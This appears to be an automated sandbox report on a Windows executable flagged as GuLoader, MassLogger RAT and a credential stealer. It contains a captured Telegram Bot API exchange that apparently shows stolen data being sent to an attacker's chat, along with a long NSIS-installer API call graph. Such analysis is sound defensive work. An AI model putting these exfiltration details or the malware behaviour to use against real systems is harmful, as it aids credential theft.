                                                                                                          2025-01-10 20:17:30 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43550,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540250,"document":{"file_n


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:15:15:19
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\ajRZflJ2ch.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'026'527 bytes
                                                                                                          MD5 hash:C9775580271050109B3431A54F1880F0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2233521222.00000000059F7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:15:16:37
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\ajRZflJ2ch.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'026'527 bytes
                                                                                                          MD5 hash:C9775580271050109B3431A54F1880F0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:19.9%
                                                                                                            Dynamic/Decrypted Code Coverage:13.4%
                                                                                                            Signature Coverage:20%
                                                                                                            Total number of Nodes:1599
                                                                                                            Total number of Limit Nodes:39
                                                                                                            execution_graph 4163 70132993 4164 701329e3 4163->4164 4165 701329a3 VirtualProtect 4163->4165 4165->4164 4166 401941 4167 401943 4166->4167 4172 402c41 4167->4172 4173 402c4d 4172->4173 4218 40640a 4173->4218 4176 401948 4178 405afa 4176->4178 4260 405dc5 4178->4260 4181 405b22 DeleteFileW 4183 401951 4181->4183 4182 405b39 4184 405c64 4182->4184 4274 4063e8 lstrcpynW 4182->4274 4184->4183 4303 40672b FindFirstFileW 4184->4303 4186 405b5f 4187 405b72 4186->4187 4188 405b65 lstrcatW 4186->4188 4275 405d09 lstrlenW 4187->4275 4189 405b78 4188->4189 4192 405b88 lstrcatW 4189->4192 4193 405b7e 4189->4193 4196 405b93 lstrlenW FindFirstFileW 4192->4196 4193->4192 4193->4196 4195 405c82 4306 405cbd lstrlenW CharPrevW 4195->4306 4198 405c59 4196->4198 4207 405bb5 4196->4207 4198->4184 4200 405c3c FindNextFileW 4204 405c52 FindClose 4200->4204 4200->4207 4201 405ab2 5 API calls 4203 405c94 4201->4203 4205 405c98 4203->4205 4206 405cae 4203->4206 4204->4198 4205->4183 4210 405450 24 API calls 4205->4210 4209 405450 24 API calls 4206->4209 4207->4200 4211 405afa 60 API calls 4207->4211 4213 405450 24 API calls 4207->4213 4279 4063e8 lstrcpynW 4207->4279 4280 405ab2 4207->4280 4288 405450 4207->4288 4299 4061ae MoveFileExW 4207->4299 4209->4183 4212 405ca5 4210->4212 4211->4207 4214 4061ae 36 API calls 4212->4214 4213->4200 4215 405cac 4214->4215 4215->4183 4219 406417 4218->4219 4220 406662 4219->4220 4223 406630 lstrlenW 4219->4223 4224 40640a 10 API calls 4219->4224 4227 406545 GetSystemDirectoryW 4219->4227 4229 406558 GetWindowsDirectoryW 4219->4229 4230 40667c 5 API calls 4219->4230 4231 40640a 10 API calls 4219->4231 4232 4065d3 lstrcatW 4219->4232 4233 40658c SHGetSpecialFolderLocation 4219->4233 4244 4062b6 4219->4244 4249 40632f wsprintfW 4219->4249 4250 4063e8 lstrcpynW 4219->4250 4221 402c6e 4220->4221 4251 4063e8 lstrcpynW 4220->4251 4221->4176 4235 40667c 4221->4235 4223->4219 4224->4223 4227->4219 4229->4219 4230->4219 4231->4219 4232->4219 4233->4219 4234 4065a4 SHGetPathFromIDListW CoTaskMemFree 4233->4234 4234->4219 4236 406689 4235->4236 4238 4066f2 CharNextW 4236->4238 4239 4066ff 4236->4239 4242 4066de CharNextW 4236->4242 4243 4066ed CharNextW 4236->4243 4256 405cea 4236->4256 4237 406704 CharPrevW 4237->4239 4238->4236 4238->4239 4239->4237 4241 406725 4239->4241 4241->4176 4242->4236 4243->4238 4252 406255 4244->4252 4247 40631a 4247->4219 4248 4062ea RegQueryValueExW RegCloseKey 4248->4247 4249->4219 4250->4219 4251->4221 4253 406264 4252->4253 4254 406268 4253->4254 4255 40626d RegOpenKeyExW 4253->4255 4254->4247 4254->4248 4255->4254 4257 405cf0 4256->4257 4258 405d06 4257->4258 4259 405cf7 CharNextW 4257->4259 4258->4236 4259->4257 4309 4063e8 lstrcpynW 4260->4309 4262 405dd6 4310 405d68 CharNextW CharNextW 4262->4310 4265 405b1a 4265->4181 4265->4182 4266 40667c 5 API calls 4272 405dec 4266->4272 4267 405e1d lstrlenW 4268 405e28 4267->4268 4267->4272 4270 405cbd 3 API calls 4268->4270 4269 40672b 2 API calls 4269->4272 4271 405e2d GetFileAttributesW 4270->4271 4271->4265 4272->4265 4272->4267 4272->4269 4273 405d09 2 API calls 4272->4273 4273->4267 4274->4186 4276 405d17 4275->4276 4277 405d29 4276->4277 4278 405d1d CharPrevW 4276->4278 4277->4189 4278->4276 4278->4277 4279->4207 4316 405eb9 GetFileAttributesW 4280->4316 4283 405adf 4283->4207 4284 405ad5 DeleteFileW 4286 405adb 4284->4286 4285 405acd RemoveDirectoryW 4285->4286 4286->4283 4287 405aeb SetFileAttributesW 4286->4287 4287->4283 4289 40546b 4288->4289 4298 40550d 4288->4298 4290 405487 lstrlenW 4289->4290 4291 40640a 17 API calls 4289->4291 4292 4054b0 4290->4292 4293 405495 lstrlenW 4290->4293 4291->4290 4295 4054c3 4292->4295 4296 4054b6 SetWindowTextW 4292->4296 4294 4054a7 lstrcatW 4293->4294 4293->4298 4294->4292 4297 4054c9 SendMessageW SendMessageW SendMessageW 4295->4297 4295->4298 4296->4295 4297->4298 4298->4207 4300 4061cf 4299->4300 4301 4061c2 4299->4301 4300->4207 4319 406034 4301->4319 4304 406741 FindClose 4303->4304 4305 405c7e 4303->4305 4304->4305 4305->4183 4305->4195 4307 405c88 4306->4307 4308 405cd9 lstrcatW 4306->4308 4307->4201 4308->4307 4309->4262 4311 405d85 4310->4311 4314 405d97 4310->4314 4312 405d92 CharNextW 4311->4312 4311->4314 4315 405dbb 4312->4315 4313 405cea CharNextW 4313->4314 4314->4313 4314->4315 4315->4265 4315->4266 4317 405abe 4316->4317 4318 405ecb SetFileAttributesW 4316->4318 4317->4283 4317->4284 4317->4285 4318->4317 4320 406064 4319->4320 4321 40608a GetShortPathNameW 4319->4321 4346 405ede GetFileAttributesW CreateFileW 4320->4346 4323 4061a9 4321->4323 4324 40609f 4321->4324 4323->4300 4324->4323 4326 4060a7 wsprintfA 4324->4326 4325 40606e CloseHandle GetShortPathNameW 4325->4323 4327 406082 4325->4327 4328 40640a 17 API calls 4326->4328 4327->4321 4327->4323 4329 4060cf 4328->4329 4347 405ede GetFileAttributesW CreateFileW 4329->4347 4331 4060dc 4331->4323 4332 4060eb GetFileSize GlobalAlloc 4331->4332 4333 4061a2 CloseHandle 4332->4333 4334 40610d 4332->4334 4333->4323 4348 405f61 ReadFile 4334->4348 4339 406140 4341 405e43 4 API calls 4339->4341 4340 40612c lstrcpyA 4342 40614e 4340->4342 4341->4342 4343 406185 SetFilePointer 4342->4343 4355 405f90 WriteFile 4343->4355 4346->4325 4347->4331 4349 405f7f 4348->4349 4349->4333 4350 405e43 lstrlenA 4349->4350 4351 405e84 lstrlenA 4350->4351 4352 405e8c 4351->4352 4353 405e5d lstrcmpiA 4351->4353 4352->4339 4352->4340 4353->4352 4354 405e7b CharNextA 4353->4354 4354->4351 4356 405fae GlobalFree 4355->4356 4356->4333 4357 4015c1 4358 402c41 17 API calls 4357->4358 4359 4015c8 4358->4359 4360 405d68 4 API calls 4359->4360 4375 4015d1 4360->4375 4361 401631 4363 401663 4361->4363 4364 401636 4361->4364 4362 405cea CharNextW 4362->4375 4366 401423 24 API calls 4363->4366 4384 401423 4364->4384 4373 40165b 4366->4373 4371 40164a SetCurrentDirectoryW 4371->4373 4372 401617 GetFileAttributesW 4372->4375 4375->4361 4375->4362 4375->4372 4376 4059b9 4375->4376 4379 40591f CreateDirectoryW 4375->4379 4388 40599c CreateDirectoryW 4375->4388 4391 4067c2 GetModuleHandleA 4376->4391 4380 405970 GetLastError 4379->4380 4381 40596c 4379->4381 4380->4381 4382 40597f SetFileSecurityW 4380->4382 4381->4375 4382->4381 4383 405995 GetLastError 4382->4383 4383->4381 4385 405450 24 API calls 4384->4385 4386 401431 4385->4386 4387 4063e8 lstrcpynW 4386->4387 4387->4371 4389 4059b0 GetLastError 4388->4389 4390 4059ac 4388->4390 4389->4390 4390->4375 4392 4067e8 GetProcAddress 4391->4392 4393 4067de 4391->4393 4394 4059c0 4392->4394 4397 406752 GetSystemDirectoryW 4393->4397 4394->4375 4396 4067e4 4396->4392 4396->4394 4398 406774 wsprintfW LoadLibraryExW 4397->4398 4398->4396 4400 4053c4 4401 4053d4 4400->4401 4402 4053e8 4400->4402 4403 4053da 4401->4403 4413 405431 4401->4413 4404 4053f0 IsWindowVisible 4402->4404 4409 405410 4402->4409 4414 4043ab 4403->4414 4407 4053fd 4404->4407 4404->4413 4405 405436 CallWindowProcW 4410 4053e4 4405->4410 4417 404d1a SendMessageW 4407->4417 4409->4405 4422 404d9a 4409->4422 4413->4405 4415 4043c3 4414->4415 4416 4043b4 SendMessageW 4414->4416 4415->4410 4416->4415 4418 404d79 SendMessageW 4417->4418 4419 404d3d GetMessagePos ScreenToClient SendMessageW 4417->4419 4420 404d71 4418->4420 4419->4420 4421 404d76 4419->4421 4420->4409 4421->4418 4431 4063e8 lstrcpynW 4422->4431 4424 404dad 4432 40632f wsprintfW 4424->4432 4426 404db7 4433 40140b 4426->4433 4430 404dc7 4430->4413 4431->4424 4432->4426 4437 401389 4433->4437 4436 4063e8 lstrcpynW 4436->4430 4438 401390 4437->4438 4439 4013fe 4438->4439 4440 4013cb MulDiv SendMessageW 4438->4440 4439->4436 4440->4438 4885 401e49 4886 402c1f 17 API calls 4885->4886 4887 401e4f 4886->4887 4888 402c1f 17 API calls 4887->4888 4889 401e5b 4888->4889 4890 401e72 EnableWindow 4889->4890 4891 401e67 ShowWindow 4889->4891 4892 402ac5 4890->4892 4891->4892 4893 40264a 4894 402c1f 17 API calls 4893->4894 4895 402659 4894->4895 4896 4026a3 ReadFile 4895->4896 4897 40273c 4895->4897 4898 405f61 ReadFile 4895->4898 4900 4026e3 MultiByteToWideChar 4895->4900 4901 402798 4895->4901 4903 402709 SetFilePointer MultiByteToWideChar 4895->4903 4904 4027a9 4895->4904 4906 402796 4895->4906 4896->4895 4896->4906 4897->4895 4897->4906 4907 405fbf SetFilePointer 4897->4907 4898->4895 4900->4895 4916 40632f wsprintfW 4901->4916 4903->4895 4905 4027ca SetFilePointer 4904->4905 4904->4906 4905->4906 4908 405fdb 4907->4908 4915 405ff3 4907->4915 4909 405f61 ReadFile 4908->4909 4910 405fe7 4909->4910 4911 406024 SetFilePointer 4910->4911 4912 405ffc SetFilePointer 4910->4912 4910->4915 4911->4915 4912->4911 4913 406007 4912->4913 4914 405f90 WriteFile 4913->4914 4914->4915 4915->4897 4916->4906 4917 404dcc GetDlgItem GetDlgItem 4918 404e1e 7 API calls 4917->4918 4925 405037 4917->4925 4919 404ec1 DeleteObject 4918->4919 4920 404eb4 SendMessageW 4918->4920 4921 404eca 4919->4921 4920->4919 4922 404f01 4921->4922 4924 404ed9 4921->4924 4927 40435f 18 API calls 4922->4927 4923 40511b 4928 4051c7 4923->4928 4935 4053af 4923->4935 4939 405174 SendMessageW 4923->4939 4929 40640a 17 API calls 4924->4929 4925->4923 4926 4050fc 4925->4926 4933 405097 4925->4933 4926->4923 4936 40510d SendMessageW 4926->4936 4934 404f15 4927->4934 4930 4051d1 SendMessageW 4928->4930 4931 4051d9 4928->4931 4932 404ee3 SendMessageW SendMessageW 4929->4932 4930->4931 4942 4051f2 4931->4942 4943 4051eb ImageList_Destroy 4931->4943 4950 405202 4931->4950 4932->4921 4937 404d1a 5 API calls 4933->4937 4938 40435f 18 API calls 4934->4938 4940 4043c6 8 API calls 4935->4940 4936->4923 4954 4050a8 4937->4954 4955 404f23 4938->4955 4939->4935 4945 405189 SendMessageW 4939->4945 4941 4053bd 4940->4941 4946 4051fb GlobalFree 4942->4946 4942->4950 4943->4942 4944 405371 4944->4935 4951 405383 ShowWindow GetDlgItem ShowWindow 4944->4951 4948 40519c 4945->4948 4946->4950 4947 404ff8 GetWindowLongW SetWindowLongW 4949 405011 4947->4949 4959 4051ad SendMessageW 4948->4959 4952 405017 ShowWindow 4949->4952 4953 40502f 4949->4953 4950->4944 4964 404d9a 4 API calls 4950->4964 4968 40523d 4950->4968 4951->4935 4973 404394 SendMessageW 4952->4973 4974 404394 SendMessageW 4953->4974 4954->4926 4955->4947 4958 404f73 SendMessageW 4955->4958 4960 404ff2 4955->4960 4962 404fc0 SendMessageW 4955->4962 4963 404faf SendMessageW 4955->4963 4958->4955 4959->4928 4960->4947 4960->4949 4961 40502a 4961->4935 4962->4955 4963->4955 4964->4968 4965 405347 InvalidateRect 4965->4944 4966 40535d 4965->4966 4975 404cd5 4966->4975 4967 40526b SendMessageW 4969 405281 4967->4969 4968->4967 4968->4969 4969->4965 4970 4052e2 4969->4970 4972 4052f5 SendMessageW SendMessageW 4969->4972 4970->4972 4972->4969 4973->4961 4974->4925 4978 404c0c 4975->4978 4977 404cea 4977->4944 4979 404c25 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404c89 4980->4981 4982 40640a 17 API calls 4981->4982 4983 404c94 4982->4983 4984 40640a 17 API calls 4983->4984 4985 404caa lstrlenW wsprintfW SetDlgItemTextW 4984->4985 4985->4977 5314 4016cc 5315 402c41 17 API calls 5314->5315 5316 4016d2 GetFullPathNameW 5315->5316 5317 4016ec 5316->5317 5318 40170e 5316->5318 5317->5318 5321 40672b 2 API calls 5317->5321 5319 401723 GetShortPathNameW 5318->5319 5320 402ac5 5318->5320 5319->5320 5322 4016fe 5321->5322 5322->5318 5324 4063e8 lstrcpynW 5322->5324 5324->5318 5325 40234e 5326 402c41 17 API calls 5325->5326 5327 40235d 5326->5327 5328 402c41 17 API calls 5327->5328 5329 402366 5328->5329 5330 402c41 17 API calls 5329->5330 5331 402370 GetPrivateProfileStringW 5330->5331 5332 4044cf lstrlenW 5333 4044f0 WideCharToMultiByte 5332->5333 5334 4044ee 5332->5334 5334->5333 5335 404850 5336 40487c 5335->5336 5337 40488d 5335->5337 5396 405a32 GetDlgItemTextW 5336->5396 5339 404899 GetDlgItem 5337->5339 5371 4048f8 5337->5371 5344 4048ad 5339->5344 5340 404887 5341 40667c 5 API calls 5340->5341 5341->5337 5342 4049dc 5345 404b8b 5342->5345 5398 405a32 GetDlgItemTextW 5342->5398 5343 4048c1 SetWindowTextW 5347 40435f 18 API calls 5343->5347 5344->5343 5351 405d68 4 API calls 5344->5351 5350 4043c6 8 API calls 5345->5350 5352 4048dd 5347->5352 5348 40640a 17 API calls 5353 40496c SHBrowseForFolderW 5348->5353 5349 404a0c 5354 405dc5 18 API calls 5349->5354 5355 404b9f 5350->5355 5356 4048b7 5351->5356 5357 40435f 18 API calls 5352->5357 5353->5342 5358 404984 CoTaskMemFree 5353->5358 5359 404a12 5354->5359 5356->5343 5362 405cbd 3 API calls 5356->5362 5360 4048eb 5357->5360 5361 405cbd 3 API calls 5358->5361 5399 4063e8 lstrcpynW 5359->5399 5397 404394 SendMessageW 5360->5397 5364 404991 5361->5364 5362->5343 5367 4049c8 SetDlgItemTextW 5364->5367 5372 40640a 17 API calls 5364->5372 5366 4048f1 5369 4067c2 5 API calls 5366->5369 5367->5342 5368 404a29 5370 4067c2 5 API calls 5368->5370 5369->5371 5379 404a30 5370->5379 5371->5342 5371->5345 5371->5348 5373 4049b0 lstrcmpiW 5372->5373 5373->5367 5376 4049c1 lstrcatW 5373->5376 5374 404a71 5400 4063e8 lstrcpynW 5374->5400 5376->5367 5377 404a78 5378 405d68 4 API calls 5377->5378 5380 404a7e GetDiskFreeSpaceW 5378->5380 5379->5374 5382 405d09 2 API calls 5379->5382 5384 404ac9 5379->5384 5383 404aa2 MulDiv 5380->5383 5380->5384 5382->5379 5383->5384 5385 404b3a 5384->5385 5386 404cd5 20 API calls 5384->5386 5387 404b5d 5385->5387 5389 40140b 2 API calls 5385->5389 5388 404b27 5386->5388 5401 404381 EnableWindow 5387->5401 5391 404b3c SetDlgItemTextW 5388->5391 5392 404b2c 5388->5392 5389->5387 5391->5385 5394 404c0c 20 API calls 5392->5394 5393 404b79 5393->5345 5402 4047a9 5393->5402 5394->5385 5396->5340 5397->5366 5398->5349 5399->5368 5400->5377 5401->5393 5403 4047b7 5402->5403 5404 4047bc SendMessageW 5402->5404 5403->5404 5404->5345 5405 70131000 5408 7013101b 5405->5408 5415 70131516 5408->5415 5410 70131020 5411 70131027 GlobalAlloc 5410->5411 5412 70131024 5410->5412 5411->5412 5413 7013153d 3 API calls 5412->5413 5414 70131019 5413->5414 5417 7013151c 5415->5417 5416 70131522 5416->5410 5417->5416 5418 7013152e GlobalFree 5417->5418 5418->5410 5419 401b53 5420 402c41 17 API calls 5419->5420 5421 401b5a 5420->5421 5422 402c1f 17 API calls 5421->5422 5423 401b63 wsprintfW 5422->5423 5424 402ac5 5423->5424 5425 401956 5426 402c41 17 API calls 5425->5426 5427 40195d lstrlenW 5426->5427 5428 402592 5427->5428 5429 406ed6 5433 406976 5429->5433 5430 4072e1 5431 406a00 GlobalAlloc 5431->5430 5431->5433 5432 4069f7 GlobalFree 5432->5431 5433->5430 5433->5431 5433->5432 5433->5433 5434 406a77 GlobalAlloc 5433->5434 5435 406a6e GlobalFree 5433->5435 5434->5430 5434->5433 5435->5434 5436 4014d7 5437 402c1f 17 API calls 5436->5437 5438 4014dd Sleep 5437->5438 5440 402ac5 5438->5440 5441 401f58 5442 402c41 17 API calls 5441->5442 5443 401f5f 5442->5443 5444 40672b 2 API calls 5443->5444 5445 401f65 5444->5445 5447 401f76 5445->5447 5448 40632f wsprintfW 5445->5448 5448->5447 5449 402259 5450 402c41 17 API calls 5449->5450 5451 40225f 5450->5451 5452 402c41 17 API calls 5451->5452 5453 402268 5452->5453 5454 402c41 17 API calls 5453->5454 5455 402271 5454->5455 5456 40672b 2 API calls 5455->5456 5457 40227a 5456->5457 5458 40228b lstrlenW lstrlenW 5457->5458 5462 40227e 5457->5462 5460 405450 24 API calls 5458->5460 5459 405450 24 API calls 5463 402286 5459->5463 5461 4022c9 SHFileOperationW 5460->5461 5461->5462 5461->5463 5462->5459 5305 40175c 5306 402c41 17 API calls 5305->5306 5307 401763 5306->5307 5308 405f0d 2 API calls 5307->5308 5309 40176a 5308->5309 5310 405f0d 2 API calls 5309->5310 5310->5309 5464 401d5d GetDlgItem GetClientRect 5465 402c41 17 API calls 5464->5465 5466 401d8f LoadImageW SendMessageW 5465->5466 5467 402ac5 5466->5467 5468 401dad DeleteObject 5466->5468 5468->5467 5469 4022dd 5470 4022f7 5469->5470 5471 4022e4 5469->5471 5472 40640a 17 API calls 5471->5472 5473 4022f1 5472->5473 5474 405a4e MessageBoxIndirectW 5473->5474 5474->5470 5475 401563 5476 402a6b 5475->5476 5479 40632f wsprintfW 5476->5479 5478 402a70 5479->5478 4441 4023e4 4442 402c41 17 API calls 4441->4442 4443 4023f6 4442->4443 4444 402c41 17 API calls 4443->4444 4445 402400 4444->4445 4458 402cd1 4445->4458 4448 402438 4453 402444 4448->4453 4462 402c1f 4448->4462 4449 40288b 4450 402c41 17 API calls 4454 40242e lstrlenW 4450->4454 4452 402463 RegSetValueExW 4456 402479 RegCloseKey 4452->4456 4453->4452 4465 4031d6 4453->4465 4454->4448 4456->4449 4459 402cec 4458->4459 4480 406283 4459->4480 4463 40640a 17 API calls 4462->4463 4464 402c34 4463->4464 4464->4453 4466 403201 4465->4466 4467 4031e5 SetFilePointer 4465->4467 4484 4032de GetTickCount 4466->4484 4467->4466 4470 40329e 4470->4452 4471 405f61 ReadFile 4472 403221 4471->4472 4472->4470 4473 4032de 42 API calls 4472->4473 4474 403238 4473->4474 4474->4470 4475 4032a4 ReadFile 4474->4475 4477 403247 4474->4477 4475->4470 4477->4470 4478 405f61 ReadFile 4477->4478 4479 405f90 WriteFile 4477->4479 4478->4477 4479->4477 4481 406292 4480->4481 4482 40629d RegCreateKeyExW 4481->4482 4483 402410 4481->4483 4482->4483 4483->4448 4483->4449 4483->4450 4485 403436 4484->4485 4486 40330c 4484->4486 4487 402e8e 32 API calls 4485->4487 4497 40345d SetFilePointer 4486->4497 4493 403208 4487->4493 4489 403317 SetFilePointer 4495 40333c 4489->4495 4493->4470 4493->4471 4494 405f90 WriteFile 4494->4495 4495->4493 4495->4494 4496 403417 SetFilePointer 4495->4496 4498 403447 4495->4498 4501 406943 4495->4501 4508 402e8e 4495->4508 4496->4485 4497->4489 4499 405f61 ReadFile 4498->4499 4500 40345a 4499->4500 4500->4495 4502 406968 4501->4502 4503 406970 4501->4503 4502->4495 4503->4502 4504 406a00 GlobalAlloc 4503->4504 4505 4069f7 GlobalFree 4503->4505 4506 406a77 GlobalAlloc 4503->4506 4507 406a6e GlobalFree 4503->4507 4504->4502 4504->4503 4505->4504 4506->4502 4506->4503 4507->4506 4509 402eb7 4508->4509 4510 402e9f 4508->4510 4513 402ec7 GetTickCount 4509->4513 4514 402ebf 4509->4514 4511 402ea8 DestroyWindow 4510->4511 4512 402eaf 4510->4512 4511->4512 4512->4495 4513->4512 4516 402ed5 4513->4516 4523 4067fe 4514->4523 4517 402f0a CreateDialogParamW ShowWindow 4516->4517 4518 402edd 4516->4518 4517->4512 4518->4512 4527 402e72 4518->4527 4520 402eeb wsprintfW 4521 405450 24 API calls 4520->4521 4522 402f08 4521->4522 4522->4512 4524 40681b PeekMessageW 4523->4524 4525 406811 DispatchMessageW 4524->4525 4526 40682b 4524->4526 4525->4524 4526->4512 4528 402e81 4527->4528 4529 402e83 MulDiv 4527->4529 4528->4529 4529->4520 5487 402868 5488 402c41 17 API calls 5487->5488 5489 40286f FindFirstFileW 5488->5489 5490 402897 5489->5490 5493 402882 5489->5493 5495 40632f wsprintfW 5490->5495 5492 4028a0 5496 4063e8 lstrcpynW 5492->5496 5495->5492 5496->5493 5497 401968 5498 402c1f 17 API calls 5497->5498 5499 40196f 5498->5499 5500 402c1f 17 API calls 5499->5500 5501 40197c 5500->5501 5502 402c41 17 API calls 5501->5502 5503 401993 lstrlenW 5502->5503 5505 4019a4 5503->5505 5504 4019e5 5505->5504 5509 4063e8 lstrcpynW 5505->5509 5507 4019d5 5507->5504 5508 4019da lstrlenW 5507->5508 5508->5504 5509->5507 5510 40166a 5511 402c41 17 API calls 5510->5511 5512 401670 5511->5512 5513 40672b 2 API calls 5512->5513 5514 401676 5513->5514 5515 7013103d 5516 7013101b 5 API calls 5515->5516 5517 70131056 5516->5517 5015 40176f 5016 402c41 17 API calls 5015->5016 5017 401776 5016->5017 5018 401796 5017->5018 5019 40179e 5017->5019 5055 4063e8 lstrcpynW 5018->5055 5056 4063e8 lstrcpynW 5019->5056 5022 40179c 5026 40667c 5 API calls 5022->5026 5023 4017a9 5024 405cbd 3 API calls 5023->5024 5025 4017af lstrcatW 5024->5025 5025->5022 5048 4017bb 5026->5048 5027 40672b 2 API calls 5027->5048 5028 4017f7 5029 405eb9 2 API calls 5028->5029 5029->5048 5031 4017cd CompareFileTime 5031->5048 5032 40188d 5034 405450 24 API calls 5032->5034 5033 401864 5035 405450 24 API calls 5033->5035 5053 401879 5033->5053 5036 401897 5034->5036 5035->5053 5037 4031d6 44 API calls 5036->5037 5038 4018aa 5037->5038 5039 4018be SetFileTime 5038->5039 5041 4018d0 CloseHandle 5038->5041 5039->5041 5040 40640a 17 API calls 5040->5048 5042 4018e1 5041->5042 5041->5053 5043 4018e6 5042->5043 5044 4018f9 5042->5044 5046 40640a 17 API calls 5043->5046 5047 40640a 17 API calls 5044->5047 5045 4063e8 lstrcpynW 5045->5048 5049 4018ee lstrcatW 5046->5049 5050 401901 5047->5050 5048->5027 5048->5028 5048->5031 5048->5032 5048->5033 5048->5040 5048->5045 5051 405a4e MessageBoxIndirectW 5048->5051 5054 405ede GetFileAttributesW CreateFileW 5048->5054 5049->5050 5052 405a4e MessageBoxIndirectW 5050->5052 5051->5048 5052->5053 5054->5048 5055->5022 5056->5023 5057 4027ef 5058 402a70 5057->5058 5059 4027f6 5057->5059 5060 402c1f 17 API calls 5059->5060 5061 4027fd 5060->5061 5062 40280c SetFilePointer 5061->5062 5062->5058 5063 40281c 5062->5063 5065 40632f wsprintfW 5063->5065 5065->5058 5518 401a72 5519 402c1f 17 API calls 5518->5519 5520 401a7b 5519->5520 5521 402c1f 17 API calls 5520->5521 5522 401a20 5521->5522 5523 406af2 5524 406976 5523->5524 5525 4072e1 5524->5525 5526 406a00 GlobalAlloc 5524->5526 5527 4069f7 GlobalFree 5524->5527 5528 406a77 GlobalAlloc 5524->5528 5529 406a6e GlobalFree 5524->5529 5526->5524 5526->5525 5527->5526 5528->5524 5528->5525 5529->5528 5530 401573 5531 401583 ShowWindow 5530->5531 5532 40158c 5530->5532 5531->5532 5533 402ac5 5532->5533 5534 40159a ShowWindow 5532->5534 5534->5533 5535 401cf3 5536 402c1f 17 API calls 5535->5536 5537 401cf9 IsWindow 5536->5537 5538 401a20 5537->5538 5539 402df3 5540 402e05 SetTimer 5539->5540 5541 402e1e 5539->5541 5540->5541 5542 402e6c 5541->5542 5543 402e72 MulDiv 5541->5543 5544 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5543->5544 5544->5542 5546 4014f5 SetForegroundWindow 5547 402ac5 5546->5547 5548 402576 5549 402c41 17 API calls 5548->5549 5550 40257d 5549->5550 5553 405ede GetFileAttributesW CreateFileW 5550->5553 5552 402589 5553->5552 5257 401b77 5258 401b84 5257->5258 5259 401bc8 5257->5259 5260 401c0d 5258->5260 5266 401b9b 5258->5266 5261 401bf2 GlobalAlloc 5259->5261 5262 401bcd 5259->5262 5263 40640a 17 API calls 5260->5263 5272 4022f7 5260->5272 5264 40640a 17 API calls 5261->5264 5262->5272 5278 4063e8 lstrcpynW 5262->5278 5265 4022f1 5263->5265 5264->5260 5270 405a4e MessageBoxIndirectW 5265->5270 5276 4063e8 lstrcpynW 5266->5276 5269 401bdf GlobalFree 5269->5272 5270->5272 5271 401baa 5277 4063e8 lstrcpynW 5271->5277 5274 401bb9 5279 4063e8 lstrcpynW 5274->5279 5276->5271 5277->5274 5278->5269 5279->5272 5280 4024f8 5281 402c81 17 API calls 5280->5281 5282 402502 5281->5282 5283 402c1f 17 API calls 5282->5283 5284 40250b 5283->5284 5285 402533 RegEnumValueW 5284->5285 5286 402527 RegEnumKeyW 5284->5286 5289 40288b 5284->5289 5287 40254f RegCloseKey 5285->5287 5288 402548 5285->5288 5286->5287 5287->5289 5288->5287 5291 40167b 5292 402c41 17 API calls 5291->5292 5293 401682 5292->5293 5294 402c41 17 API calls 5293->5294 5295 40168b 5294->5295 5296 402c41 17 API calls 5295->5296 5297 401694 MoveFileW 5296->5297 5298 4016a7 5297->5298 5299 4016a0 5297->5299 5301 40672b 2 